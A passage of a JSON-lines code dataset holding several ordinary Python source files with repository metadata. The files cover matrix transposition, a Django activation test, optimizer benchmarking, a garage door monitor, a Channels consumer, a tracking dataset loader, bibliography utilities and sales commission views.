di transpose : \")\r\nfor i in range (baris):\r\n for j in range (kolom):\r\n print (str(M[i][j])+\"\", end='')\r\n print ( )\r\n\r\n#Proses mengubah ke transpose matriks dengan perulangan bertingkat\r\n\r\nprint (\"Transpose Matriks: \")\r\nfor i in range (kolom):\r\n for j in range (baris):\r\n print (str(M[j][i])+\" \", end='')\r\n print ( )","repo_name":"DarellTimothy/Python-Projects","sub_path":"Program That Transposes Matrices.py","file_name":"Program That Transposes Matrices.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36095931156","text":"#!/usr/bin/env python3\n\n\"\"\"Test Account Activation \nTest for '200: Account has been authorized.', '404: Credentials not found.',\nand '403: Requestor's credentials were rejected.'\n\"\"\"\n\nimport time\nfrom django.test import TestCase, Client\n\nclass ApiAccountsActivateTestCase(TestCase):\n fixtures = ['tests/fixtures/test_data']\n\n def setUp(self):\n self.client = Client()\n data = {\n 'hostname': 'UserDB',\n 'email': 'test@gwu.edu',\n 'token': 'SampleToken'\n }\n \n self.initial_response = self.client.post('/api/accounts/new/', data=data).json()\n\n def test_account_activated_forbidden(self):\n \"\"\"Test for '403: Requestor's credentials were rejected.'\n \"\"\"\n\n bad_link = self.initial_response['activation_link']+ \"bad_content\"\n response = self.client.get(bad_link)\n self.assertEqual(response.status_code, 403)","repo_name":"biocompute-objects/bco_api","sub_path":"tests/test_views/test_api_account_activate.py","file_name":"test_api_account_activate.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"42503325709","text":"\"\"\"Benchmarking optimization algorithm\n\"\"\"\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom optim.test_function import test_functions\n\ndef get_test_functions_for_dim(dim):\n ans = [tf(n=dim) for tf in test_functions]\n return [tf.__class__ for tf in ans if dim==tf.n]\n\ndef benchmark(optimizers, initial_condition):\n dim = initial_condition.shape[-1]\n columns = [\"Optimizer\",\"Test function\",\"runtime\",\"l2_error\",\"optimizer\"]\n data = {k:[] for k in columns}\n results = pd.DataFrame(data = data, columns=columns)\n if isinstance(optimizers, list):\n for optimizer in optimizers:\n results = results.append(benchmark(optimizer, initial_condition))\n return results\n for tf in get_test_functions_for_dim(dim):\n # instantiate the test function\n F = tf(n=dim)\n # solve the optimization problem with the algorithm\n t0 = time.time()\n x_solution = optimizers.optimize(F, x0=initial_condition)\n t0 = time.time() - t0\n # get distance to optimal solution\n if len(F.x_star.shape)==1:\n l2_norm = np.linalg.norm(F.x_star - x_solution)\n else:\n l2_norm = np.linalg.norm(F.x_star - x_solution, axis=1)\n l2_norm = np.min(l2_norm)\n results = results.append({\"Optimizer\":optimizers.__class__.__name__,\n \"Test function\":tf.__name__,\n \"runtime\":t0,\n \"l2_error\":l2_norm,\n \"optimizer\":optimizers,\n \"iterations\":optimizers.it}, ignore_index=True)\n #results[\"iterations\"]=[o.it for o in results[\"optimizer\"]]\n return results\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ndef test_function_result_bar_plot(results, title=\"Test function optimization\", **seaborn_kwargs):\n ax=sns.barplot(x=\"l2_error\", y=\"Test function\",orient=\"h\",data=results,**seaborn_kwargs)\n #ax.set_xticklabels(labels,rotation=45)\n ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"1 / ||\\hat{x} - x^*||\")\n return ax\n\ndef iteration_bar_plot(results, title=\"Test function optimization\",**seaborn_kwargs):\n ax=sns.barplot(x=\"iterations\", y=\"Test function\",orient=\"h\",data=results,**seaborn_kwargs)\n ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"iterations\")\n return ax\n\ndef runtime_bar_plot(results, title=\"Test function optimization\", **seaborn_kwargs):\n ax=sns.barplot(x=\"runtime\", y=\"Test function\",orient=\"h\",data=results, **seaborn_kwargs)\n #ax.set_xticklabels(labels,rotation=45)\n ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"runtime (ms)\")\n return ax\n\n\n\nif __name__==\"__main__\":\n from optim.utils import print_dict\n\n # test the RandomOptimizer\n from optim.blackbox.random import RandomOptimizer\n from optim.blackbox.pattern import NelderMead\n from optim.blackbox.cmaes import CMAES\n\n optimizer = RandomOptimizer()\n x0 = np.random.random_sample(5)\n results = benchmark(optimizer, x0)\n \n # create a first simple figure\n #print_dict(results)\n\n #ax = test_function_result_bar_plot(results)\n #plt.show()\n #ax = iteration_bar_plot(results)\n #plt.show()\n #ax = runtime_bar_plot(results)\n #plt.show()\n\n optimizers = [RandomOptimizer(), CMAES(), NelderMead()]\n results = benchmark(optimizers, x0)\n print(results)\n\n ax = test_function_result_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n ax = iteration_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n ax = runtime_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n\n\n\n\n\n","repo_name":"Dolgalad/optim","sub_path":"optim/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73234144256","text":"from threading import Thread, Event\r\nfrom time import sleep\r\nfrom garage import Garage\r\nimport logging\r\nfrom time import time\r\n\r\nlogger = logging.getLogger('garage_state_mon')\r\n\r\nclass LastStateTransitionMonitor(Thread):\r\n\r\n\tdef __init__(self, dao, config, state=Garage.closed, notify_callback=None):\r\n\t\tThread.__init__(self)\r\n\t\tself._dao = dao\r\n\t\tself._config = config\r\n\t\tself._notify_callback = notify_callback\r\n\t\tself._state = state\r\n\t\tself._stop_event = Event()\r\n\t\t\r\n\t\r\n\tdef check_now(self):\r\n\t\tlast_time = self._dao.last_state_transition_from(self._state)\r\n\t\tif last_time is None:\r\n\t\t\tlogger.info(\"No notification required, already in \"+self._state+\" state\")\r\n\t\t\treturn\r\n\t\tif last_time == 0: \t\t\t\r\n\t\t\tmsg = 'Garage Door has never been '+self._state\r\n\t\telse:\r\n\t\t\tdiff = int(( time() - last_time ) / 60)\r\n\t\t\tself._config.reload()\r\n\t\t\tlimit = self._config['state_monitor_limit_mins']\r\n\t\t\tif diff < limit: return\r\n\t\t\tif diff > 99: diff_msg = str(round(diff/60))+' hours'\r\n\t\t\telif diff > 2880: diff_msg = str(round(diff/1440))+' days'\r\n\t\t\telse: diff_msg = str(diff)+' minutes'\r\n\t\t\tmsg = 'Garage Door has not been '+self._state+' for '+diff_msg\r\n\t\tlogger.info(msg)\r\n\t\tif self._notify_callback and self._config['state_monitor_enabled']: self._notify_callback(msg)\r\n\r\n\tdef run(self):\r\n\t\twhile 1:\r\n\t\t\tself.check_now()\r\n\t\t\tself._config.reload()\r\n\t\t\tself._stop_event.wait(self._config['state_monitor_interval_mins'] * 60)\r\n\t\t\tif( self._stop_event.is_set() ): break\r\n\t\t\r\n\tdef stop(self):\r\n\t\tself._stop_event.set()\r\n\t\r\nif __name__ == '__main__':\r\n\tfrom garage_dao import GarageDao\r\n\tfrom garage_config import GarageConfig\r\n\tdef callback(msg):\r\n\t\tprint(msg)\r\n\tlogging.basicConfig(filename=__file__+'.log',level=logging.DEBUG)\r\n\tLastStateTransitionMonitor(GarageDao(),GarageConfig(), state=Garage.opening, notify_callback=callback).run()\r\n","repo_name":"drweaver/py_garage_server","sub_path":"garage_state_mon.py","file_name":"garage_state_mon.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"44002005244","text":"# coding=utf-8\nimport json\n\nfrom channels.generic.websockets import WebsocketDemultiplexer\nfrom django.core.serializers import serialize\nfrom django.db.models import QuerySet\n\n\nclass Consumer(object):\n stream = NotImplemented\n actions = NotImplemented\n fields = NotImplemented\n\n def __init__(self):\n self.user = NotImplemented\n self.pk = NotImplemented\n self.action = NotImplemented\n self.message = NotImplemented\n self.kwargs = NotImplemented\n self.data = NotImplemented\n self.payload = NotImplemented\n\n @classmethod\n def encode(cls, stream, payload):\n raise NotImplementedError()\n\n @classmethod\n def consumer(cls, message, **kwargs):\n from django.contrib.auth.models import AnonymousUser\n\n # INBOUND\n self = cls()\n self.message = message\n self.kwargs = kwargs\n self.user = getattr(self.message, \"user\", AnonymousUser())\n self.action, self.pk, self.data = self.deserialize(self.message)\n self.data = self.run_action(self.action, self.pk)\n\n if not self.data:\n return self\n\n # OUTBOUND\n self.payload = self.serialize(self.data)\n\n if self.payload == {}:\n return self\n\n assert self.stream is not None\n message = cls.encode(self.stream, self.payload)\n self.send(message)\n return self\n\n def serialize(self, message):\n raise NotImplementedError()\n\n def deserialize(self, message):\n raise NotImplementedError()\n\n def run_action(self, action, pk):\n if action not in self.actions:\n raise ValueError('Bad action. Action must be white listed. action=%s' % action)\n\n if not self.has_permission(self.user, action, pk):\n return\n\n method = getattr(self, action)\n return method()\n\n def has_permission(self, user, action, pk):\n raise NotImplementedError()\n\n def send(self, message):\n raise NotImplementedError()\n\n\nclass ReplyChannelConsumer(Consumer):\n model = NotImplemented\n\n @classmethod\n def encode(cls, stream, payload):\n return WebsocketDemultiplexer.encode(stream, payload)\n\n @classmethod\n def serialize_data(cls, instance, fields):\n fields = None if fields == ['__all__'] else fields\n if isinstance(instance, (QuerySet, list)):\n data = serialize('json', instance, fields=fields)\n return json.loads(data)\n\n data = serialize('json', [instance], fields=fields)\n return json.loads(data)[0]['fields']\n\n @property\n def queryset(self):\n return self.model.objects.all()\n\n @property\n def model_label(self):\n return \"%s.%s\" % (\n self.model._meta.app_label.lower(),\n self.model._meta.object_name.lower(),\n )\n\n def serialize(self, data):\n payload = {\n \"action\": self.action,\n \"data\": self.serialize_data(data, self.fields),\n \"model\": self.model_label,\n }\n if self.pk is not None:\n payload['pk'] = self.pk\n return payload\n\n def deserialize(self, message):\n \"\"\"\n You must hook this up behind a Deserializer, so we expect the JSON\n already dealt with.\n \"\"\"\n action = message['action']\n pk = message.get('pk', None)\n data = message.get('data', None)\n return action, pk, data\n\n def send(self, message):\n self.message.reply_channel.send(message)\n","repo_name":"manuphatak/live_people_app","sub_path":"live_people_app/utils/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"73591449536","text":"import os\n\nimport torch.utils.data as data\nfrom os.path import join\nimport cv2\nimport json\nimport numpy as np\nfrom util import cxy_wh_2_bbox, crop_hwc\n\n\n\n#个人数据集\nclass OTB(data.Dataset):\n def __init__(self, root_path = \"\", range=10, train=True):\n self.domain2nseq = json.load(open(os.path.join(root_path,\"OTB100.json\"), 'r'))\n self.domain_list = list(self.domain2nseq.keys())\n self.root_path = root_path\n self.range = range\n self.train = train\n self.mean = np.expand_dims(np.expand_dims(np.array([109, 120, 119]), axis=1), axis=1).astype(np.float32)\n\n\n def __getitem__(self, item):\n # 随机抽取名字\n domain_name = np.random.choice(self.domain_list, size=1)[0]\n # 随机抽取两个idx\n target_id, search_id = self.getnewtwoframes(domain_name)\n \n # 获取frame_name、gt和img——name\n frame_name = self.domain2nseq[domain_name]['name']\n imgs_name = self.domain2nseq[domain_name]['image_files']\n imgs_gt = self.domain2nseq[domain_name]['gt_rect']\n\n target_gt = [imgs_gt[target_id][0], imgs_gt[target_id][1],imgs_gt[target_id][2], imgs_gt[target_id][3]]\n search_gt = [imgs_gt[search_id][0], imgs_gt[search_id][1], imgs_gt[search_id][2], imgs_gt[search_id][3]]\n\n #加载target和search图像\n target = cv2.imread(os.path.join(self.root_path, \"OTB100\", frame_name, \"img\", imgs_name[target_id]))\n search = cv2.imread(os.path.join(self.root_path, \"OTB100\", frame_name, \"img\", imgs_name[search_id]))\n\n #利用gt裁剪target和search图像\n target = self.crop_image(target,target_gt)\n search = self.crop_image(search,search_gt)\n\n\n target = np.transpose(target, (2, 0, 1)).astype(np.float32) - self.mean\n search = np.transpose(search, (2, 0, 1)).astype(np.float32) - self.mean\n\n return target, search\n def crop_image(self,image ,bbox):\n target_pos = [bbox[0] + (bbox[2])/2-1, bbox[1] + (bbox[3])/2-1]\n target_sz = np.array([bbox[2] , bbox[3]])\n window_sz = target_sz * 3\n crop_bbox = cxy_wh_2_bbox(target_pos, window_sz)\n patch = crop_hwc(image, crop_bbox, 125)\n return patch\n def getnewtwoframes(self, domain_name):\n # 获得帧列表\n num_frames = self.domain2nseq[domain_name]['image_files']\n # 随机抽取两帧并排序,两帧之间的间隔不大于100帧\n z_frame_nos = np.random.choice(range(0, len(num_frames) - 2), size=1, replace=False)\n x_frame_nos = np.random.choice(range(z_frame_nos[0], min(len(num_frames)-1, z_frame_nos[0] + self.range)), size=1,\n replace=False)\n return z_frame_nos[0], x_frame_nos[0]\n def __len__(self):\n if self.train:\n return 64000\n else:\n return 1280\n","repo_name":"Simon-Chenzw/SCUT-SE","sub_path":"computer_vision/assignment-4/DCFNET/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"26874842496","text":"import re\nimport types\nimport math\nimport datetime\nimport logging\n\nfrom pylatexenc import latex2text\n\nimport bibolamazi.init\nfrom . import version\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef get_version():\n \"\"\"\n Return the version string :py:data:`~core.version.version_str`, unchanged.\n \"\"\"\n return version.version_str\n\n_theversionsplit = None\n\ndef get_version_split():\n \"\"\"\n Return a 4-tuple `(maj, min, rel, suffix)` resulting from parsing the version obtained\n via :py:data:`version.version_str`.\n\n ............ TODO: FIXME: CURRENTLY, the elements are strings! why not integers? If\n not there, they will/should be empty or None?\n\n \"\"\"\n if (_theversionsplit is None):\n m = re.match(r'^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(.+)?)?)?', version.version_str)\n _theversionsplit = (m.group(1), m.group(2), m.group(3), m.group(4))\n return _theversionsplit\n\n\ndef get_copyrightyear():\n \"\"\"\n Return the copyright year :py:data:`~core.version.copyright_year`, unchanged.\n \"\"\"\n return version.copyright_year\n\n\n# ------------------------------------------------------------------------------\n\n\n\nclass BibolamaziError(Exception):\n \"\"\"\n Root bibolamazi error exception.\n\n See also :py:class:`~core.bibfilter.BibFilterError` and\n :py:class:`~core.bibusercache.BibUserCacheError`.\n \"\"\"\n def __init__(self, msg, where=None):\n self.where = where\n fullmsg = msg\n if (where is not None):\n fullmsg += \"\\n\\t@: \"+where\n\n super().__init__(fullmsg)\n\n\n# ------------------------------------------------------------------------------\n\ndef getbool(x):\n \"\"\"\n Utility to parse a string representing a boolean value.\n\n If `x` is already of integer or boolean type (actually, anything castable to an\n integer), then the corresponding boolean convertion is returned. If it is a\n string-like type, then it is matched against something that looks like 't(rue)?', '1',\n 'y(es)?' or 'on' (ignoring case), or against something that looks like 'f(alse)?',\n '0', 'n(o)?' or 'off' (also ignoring case). Leading or trailing whitespace is ignored. \n If the string cannot be parsed, a :py:exc:`ValueError` is raised.\n \"\"\"\n try:\n return (int(x) != 0)\n except (TypeError, ValueError):\n pass\n if isinstance(x, str):\n m = re.match(r'^\\s*(t(?:rue)?|1|y(?:es)?|on)\\s*$', x, re.IGNORECASE)\n if m:\n return True\n m = re.match(r'^\\s*(f(?:alse)?|0|n(?:o)?|off)\\s*$', x, re.IGNORECASE)\n if m:\n return False\n raise ValueError(\"Can't parse boolean value: %r\" % x)\n\n\n\ndef resolve_type(typename, in_module=None):\n \"\"\"\n Returns a type object corresponding to the given type name `typename`, given as a\n string.\n\n ..... TODO: MORE DOC .........\n \"\"\"\n\n if (in_module is not None):\n logger.longdebug(\"Resolving type %s in module %s\", typename, in_module)\n if (typename in in_module.__dict__):\n return in_module.__dict__.get(typename)\n\n logger.longdebug(\"Resolving type %s (no module)\", typename)\n\n if (typename == 'str'):\n try:\n return types.StringType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return str\n if (typename == 'bool'):\n try:\n return types.BooleanType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return bool\n if (typename == 'int'):\n try:\n return types.IntType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return int\n if (typename == 'float'):\n try:\n return types.FloatType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return float\n if (typename == 'bytes'):\n try:\n return types.StringType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return bytes\n if (typename == 'complex'):\n try:\n return types.ComplexType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return complex\n\n raise ValueError(\"Unknown type name: %s\"%(typename))\n\n\n_rx_quotearg_oknames = re.compile(r'^[-\\w./:~%#]+$')\n\ndef quotearg(x):\n \"\"\"\n If `x` contains only non-special characters, it is returned as is. The\n non-special characters are: all alphanumerical chars, hyphen, dot, slash,\n colon, tilde, percent, hash. Otherwise, put the value `x` in double-quotes,\n escaping all double-quotes and backslashes in the value of `x` by a\n backslash.\n\n The argument `x` may be either a python string or unicode object.\n\n For example:\n >>> print(quotearg('kosher_name_clean'))\n kosher_name_clean\n >>> print(quotearg('dirty name with spaces'))\n \\\"dirty name with spaces\\\"\n >>> print(quotearg(r'''really\\\\dirty\\\"name::with/tons&#$of special chars!!!'''))\n \\\"really\\\\\\\\dirty\\\\\\\"name::with/tons&#$of special chars!!!\\\"\n \"\"\"\n if not x:\n return \"\"\n if (_rx_quotearg_oknames.match(x)):\n # only very sympathetic chars\n return x\n return '\"' + re.sub(r'(\"|\\\\)', lambda m: '\\\\'+m.group(), x) + '\"'\n\n\n\n\n\ndef guess_encoding_decode(dat, encoding=None):\n\n if isinstance(dat, str):\n return dat # already unicode\n\n if encoding:\n return dat.decode(encoding)\n\n try:\n return dat.decode('utf-8')\n except UnicodeDecodeError:\n pass\n\n # this should always succeed\n return dat.decode('latin1')\n\n\n\n\n\n\ndef call_with_args(fn, *args, **kwargs):\n \"\"\"\n Utility to call a function `fn` with `*args` and `**kwargs`.\n\n `fn(*args)` must be an acceptable function call; beyond that, additional keyword\n arguments which the function accepts will be provided from `**kwargs`.\n\n This function is meant to be essentially `fn(*args, **kwargs)`, but without raising an\n error if there are arguments in `kwargs` which the function doesn't accept (in which\n case, those arguments are ignored).\n \"\"\"\n\n args2 = args\n kwargs2 = kwargs\n if hasattr(fn, '__call__'):\n args2 = [fn] + args\n fn = fn.__call__\n\n (fargs, varargs, keywords, defaults) = inspect.getargspec(fn)\n\n if keywords:\n return fn(*args2, **kwargs2)\n \n kwargs2 = dict([(k,v) for (k,v) in kwargs2 if k in fargs])\n return fn(*args2, **kwargs2)\n\n\n\n\n_rx_timedelta_part = re.compile(r'(?P\\d+(?:\\.\\d*)?|\\d*\\.\\d+)(?P\\w+)', flags=re.IGNORECASE)\n \ndef parse_timedelta(in_s):\n \"\"\"\n Note: only positive timedelta accepted.\n \"\"\"\n\n # all-lowercase, please\n keys = {\"weeks\": (7, 'days'),\n \"days\": (24, 'hours'),\n \"hours\": (60, 'minutes'),\n \"minutes\": (60, 'seconds'),\n \"seconds\": (1000, 'milliseconds'),\n }\n\n kwargs = {}\n for k in keys.keys():\n kwargs[k] = 0.0\n kwargs[keys[k][1]] = 0.0\n\n for m in _rx_timedelta_part.finditer(in_s):\n unit = m.group('unit').lower()\n keyoks = [x for x in keys if x.startswith(unit)]\n if len(keyoks) < 1:\n raise ValueError(\"Unknown unit for timedelta: %s\" %(unit))\n if len(keyoks) > 1:\n raise ValueError(\"Ambiguous unit for timedelta: %s\" %(unit)) # should never happen\n \n key = keyoks[0]\n value = float(m.group('value'))\n value_int = math.floor(value)\n kwargs[key] += value_int\n\n x = value - value_int\n\n while True:\n x *= keys[key][0]\n newkey = keys[key][1]\n v = math.floor(x)\n kwargs[newkey] += v\n x = (x - v)\n\n key = newkey\n if key not in keys:\n break\n \n #print 'kwargs: %r'%(kwargs)\n return datetime.timedelta(**kwargs)\n\n\n\ndef warn_deprecated(classname, oldname, newname, modulename=None, explanation=None):\n import traceback\n\n if modulename is not None:\n warnlogger = logging.getLogger(modulename)\n else:\n warnlogger = logger\n\n warnlogger.warning(\n (\"%(modulenamecolon)s%(classnamedot)s%(oldname)s is deprecated. Please use \"\n \"%(modulenamecolon)s%(classnamedot)s%(newname)s instead. %(explanationspace)s\"\n \"at:\\n\"\n \"%(stack)s\")\n % { 'classnamedot': (classname+'.' if classname else ''),\n 'modulenamecolon': (modulename+':' if modulename else ''),\n 'oldname': oldname,\n 'newname': newname,\n 'explanationspace': (explanation+' ' if explanation else ''),\n 'stack': traceback.format_stack(limit=3)[0],\n }\n )\n\n\n# ------------------------------------------------------------------------------\n\n# _latex2text_default_text_replacements = (\n# (\"~\", \" \"),\n# (\"``\", '\"'),\n# (\"''\", '\"'),\n# #\n# # do NOT replace tabular alignment symbol '&', because most often it's used\n# # in names perhaps unescaped, like in \"Taylor & Francis\"\n# )\n\nlatex2text_latex_context = latex2text.get_default_latex_context_db()\n# in most instances when converting to text, keep ``, '', --, ---, etc. as they are\nlatex2text_latex_context.add_context_category(\n 'override-nonascii-specials',\n prepend=True,\n macros=[],\n environments=[],\n specials=[\n latex2text.SpecialsTextSpec('~', u\" \"),\n latex2text.SpecialsTextSpec('``', u\"\\\"\"),\n latex2text.SpecialsTextSpec(\"''\", u\"\\\"\"),\n latex2text.SpecialsTextSpec(\"--\", u\"--\"),\n latex2text.SpecialsTextSpec(\"---\", u\"---\"),\n latex2text.SpecialsTextSpec(\"!`\", u\"!`\"),\n latex2text.SpecialsTextSpec(\"?`\", u\"?`\"),\n ]\n)\n\n_l2t = latex2text.LatexNodes2Text(\n strict_latex_spaces=True,\n latex_context=latex2text_latex_context,\n)\n\n\ndef latex_to_text(x):\n\n return _l2t.latex_to_text(x, tolerant_parsing=True)\n","repo_name":"phfaist/bibolamazi","sub_path":"bibolamazi/core/butils.py","file_name":"butils.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"7452093091","text":"from decimal import Decimal\r\nfrom django.shortcuts import render, redirect\r\nfrom django.db.models import Sum\r\nfrom .models import Comissao\r\nfrom contrato.models import Contrato\r\nfrom datetime import datetime\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nimport csv\r\nfrom cliente.models import Cliente\r\nfrom meuapp.utils import login_required_all\r\n\r\n@login_required_all\r\ndef calcular_comissao_old(request):\r\n if request.method == 'POST':\r\n data = request.POST.get('mes_ano')\r\n\r\n contratos_selecionadas = request.POST.getlist('contratos')\r\n\r\n # Obter as contratos selecionadas\r\n contratos_do_mes = Contrato.objects.filter(pk__in=contratos_selecionadas)\r\n\r\n # Calcular o número total de contratos selecionadas do mês\r\n numero_contratos = contratos_do_mes.count()\r\n\r\n # Calcular o valor total das contratos selecionadas do mês\r\n valor_contratos = contratos_do_mes.aggregate(total=Sum('total_contrato'))['total'] or 0\r\n\r\n #Recuperar contratos totais\r\n contratos_totais = Contrato.objects.aggregate(total=Sum('total_contrato'))['total'] or 0\r\n\r\n # Calcular a comissão\r\n if numero_contratos < 10:\r\n comissao_acumulada = Decimal(contratos_totais) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos)\r\n elif 10 <= numero_contratos <= 20:\r\n comissao_acumulada = Decimal(valor_contratos) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos) * 2\r\n else:\r\n comissao_acumulada = Decimal(valor_contratos) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos) * 3\r\n\r\n # Criar um objeto Comissao com os valores calculados\r\n comissao = Comissao(\r\n data=data,\r\n quantidade_contratos=numero_contratos,\r\n valor_contratos_mes=valor_contratos,\r\n comissao_acumulada=comissao_acumulada,\r\n comissao_mes=comissao_mes,\r\n comissao_total=comissao_mes + comissao_acumulada\r\n )\r\n comissao.save()\r\n Contrato.objects.filter(pk__in=contratos_selecionadas).update(comissao_id=comissao.id)\r\n contratos = Contrato.objects.filter(comissao_id__isnull=True)\r\n return render(request, 'listar_contratos_comissao.html', {'contratos_totais': contratos_totais, 'contratos': contratos})\r\n else:\r\n data_atual = datetime.datetime.now()\r\n # Subtrai 1 mês da data atual para obter o mês anterior\r\n mes_anterior = data_atual.month - 1\r\n ano_atual = data_atual.year\r\n if mes_anterior == 0:\r\n # Caso especial: se o mês anterior for janeiro, ajusta o ano para o ano anterior\r\n mes_anterior = 12\r\n ano_atual -= 1\r\n\r\n # Passa a variável mes_anterior para o contexto do template\r\n mes_anterior = '{:02d}/{}'.format(mes_anterior, ano_atual)\r\n print(mes_anterior)\r\n contratos = Contrato.objects.filter(comissao_id__isnull=True)\r\n return render(request, 'listar_contratos_comissao.html', {'contratos': contratos, 'mes_anterior': mes_anterior})\r\n\r\n@login_required_all\r\ndef fechar_comissao(request):\r\n if request.method == 'POST':\r\n # Obtém a data selecionada no formulário como uma string\r\n data_str = request.POST.get('data')\r\n\r\n # Converte a string de data em um objeto date\r\n data = datetime.strptime(data_str, '%Y-%m').date()\r\n print(data)\r\n # Obtém todos os contratos do mês selecionado\r\n contratos_mes = Contrato.objects.filter(data_instalacao__month=data.month, data_instalacao__year=data.year, flcancelado=False)\r\n print(contratos_mes)\r\n # Verifica a quantidade de contratos do mês selecionado\r\n quantidade_contratos_mes = contratos_mes.count()\r\n todos_contratos = Contrato.objects.filter(flcancelado=False)\r\n\r\n # Remove todos os registros de comissão existentes para o mês selecionado\r\n Comissao.objects.filter(data=data_str).delete()\r\n\r\n # Percorre todos os contratos do mês selecionado\r\n for contrato in todos_contratos:\r\n vendedor_id = contrato.vendedor_id\r\n quantidade_contratos_mes_vendedor = Contrato.objects.filter(vendedor_id=vendedor_id, data_instalacao__month=data.month, data_instalacao__year=data.year).count()\r\n # Verifica se o contrato é de um mês anterior à data selecionada\r\n if (contrato.data_instalacao.month < data.month or contrato.data_instalacao.year < data.year) and contrato.vendedor_id == 2:\r\n # Atribui 5% do valor do contrato como comissão\r\n valor_comissao_retroativa = contrato.total_contrato * Decimal('0.05')\r\n comissao_valor_contrato = 0\r\n elif contrato.data_instalacao.month < data.month or contrato.data_instalacao.year < data.year and contrato.vendedor_id != 2:\r\n # Atribui 5% do valor do contrato como comissão\r\n valor_comissao_retroativa = 0\r\n comissao_valor_contrato = 0\r\n elif contrato.data_instalacao.month > data.month or contrato.data_instalacao.year > data.year:\r\n valor_comissao_retroativa = 0\r\n comissao_valor_contrato = 0\r\n else:\r\n # Calcula a comissão com base na quantidade de contratos do mês\r\n if quantidade_contratos_mes_vendedor < 7.5:\r\n comissao_valor_contrato = contrato.total_contrato\r\n valor_comissao_retroativa = 0\r\n elif 7.5 <= quantidade_contratos_mes_vendedor <= 10:\r\n comissao_valor_contrato = contrato.total_contrato * Decimal('1.5')\r\n valor_comissao_retroativa = 0\r\n else:\r\n comissao_valor_contrato = contrato.total_contrato * Decimal('2')\r\n valor_comissao_retroativa = 0\r\n\r\n # Cria uma nova instância de Comissao com os valores calculados para o contrato\r\n comissao = Comissao(data=data_str, valor_contrato_mes=comissao_valor_contrato, contrato=contrato, valor_comissao_retroativa=valor_comissao_retroativa)\r\n\r\n # Salva a comissão no banco de dados\r\n comissao.save()\r\n\r\n # Redireciona para a página de comissões\r\n comissoes = Comissao.objects.values('data', 'contrato__vendedor__nome').annotate(soma_comissao=Sum('valor_contrato_mes'))\r\n return render(request, 'listar_comissoes.html', {'comissoes': comissoes})\r\n return render(request, 'fechar_comissao.html')\r\n\r\n@login_required_all\r\ndef calcular_comissao():\r\n # Obtém todas as comissões\r\n comissoes = Comissao.objects.all()\r\n\r\n # Cria um dicionário para armazenar os resultados por mês\r\n resultados = {}\r\n\r\n # Percorre todas as comissões\r\n for comissao in comissoes:\r\n # Obtém a data da comissão\r\n data = comissao.data\r\n\r\n # Obtém a quantidade de contratos para o mês da comissão\r\n contratos_mes = Comissao.objects.filter(data=data).count()\r\n\r\n # Obtém a quantidade total de contratos até o mês da comissão\r\n contratos_total = Comissao.objects.filter(data__lt=data).aggregate(total=Sum('valor_contrato_mes'))['total']\r\n\r\n # Verifica se contratos_total é None e atribui 0 a ele caso seja\r\n contratos_total = contratos_total if contratos_total is not None else 0\r\n\r\n # Calcula a comissão com base na quantidade de contratos do mês\r\n if contratos_mes < 10:\r\n comissao_valor = comissao.valor_contrato_mes + (contratos_total * Decimal('0.05'))\r\n elif 10 <= contratos_mes <= 20:\r\n comissao_valor = (comissao.valor_contrato_mes * 2) + (contratos_total * Decimal('0.05'))\r\n else:\r\n comissao_valor = (comissao.valor_contrato_mes * 3) + (contratos_total * Decimal('0.05'))\r\n\r\n # Armazena o resultado no dicionário\r\n resultados[data] = comissao_valor\r\n\r\n # Retorna o dicionário com os resultados\r\n return resultados\r\n\r\n@login_required_all\r\ndef listar_comissoes(request):\r\n # Agrupa as comissões por mês e soma seus valores\r\n comissoes = Comissao.objects.values('data', 'contrato__vendedor__nome').annotate(\r\n bonus_mensal=Sum('valor_contrato_mes'),\r\n comissao_fixa=Sum('valor_comissao_retroativa')\r\n )\r\n\r\n # Adiciona a soma das duas colunas em uma nova coluna\r\n for comissao in comissoes:\r\n comissao['comissao_total'] = comissao['bonus_mensal'] + comissao['comissao_fixa']\r\n \r\n return render(request, 'listar_comissoes.html', {'comissoes': comissoes})\r\n","repo_name":"kkviana/sinca-comissao","sub_path":"comissao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4794227836","text":"# Universidad Autónoma Chapingo\n# Departamento de Ingeniería Mecánica Agrícola\n# Ingeniería Mecatrónica Agrícola\n# Jym Emmanuel Cocotle 